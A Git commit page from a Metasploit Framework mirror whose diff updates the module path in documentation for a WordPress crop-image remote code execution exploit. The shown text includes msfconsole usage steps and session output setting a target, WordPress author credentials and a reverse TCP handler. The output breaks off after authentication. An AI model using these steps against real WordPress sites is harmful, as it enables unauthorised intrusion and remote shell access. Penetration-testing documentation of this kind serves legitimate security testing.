infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

modified scenario output for path

master
Shelby Pace 2019-03-25 13:58:58 -05:00
parent 8853d6d5b5
commit 2ccd753ff5
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
documentation/modules/exploit/multi/http/wp_crop_rce.md
View File

@ -16,7 +16,7 @@ More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/20
Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/unix/webapp/wp_crop_rce`
2. `use exploit/multi/http/wp_crop_rce`
3. Set the `RHOST`
4. Set `USERNAME` and `PASSWORD`
4. Set `LHOST` and `LPORT`
@ -29,14 +29,14 @@ Confirm that functionality works:
### Ubuntu 18.04 running WordPress 4.9.8
```
msf5 > use exploit/unix/webapp/wp_crop_rce
msf5 exploit(unix/webapp/wp_crop_rce) > set rhosts 127.0.0.1
msf5 > use exploit/multi/http/wp_crop_rce
msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/wp_crop_rce) > set username author
msf5 exploit(multi/http/wp_crop_rce) > set username author
username => author
msf5 exploit(unix/webapp/wp_crop_rce) > set password author
msf5 exploit(multi/http/wp_crop_rce) > set password author
password => author
msf5 exploit(unix/webapp/wp_crop_rce) > run
msf5 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...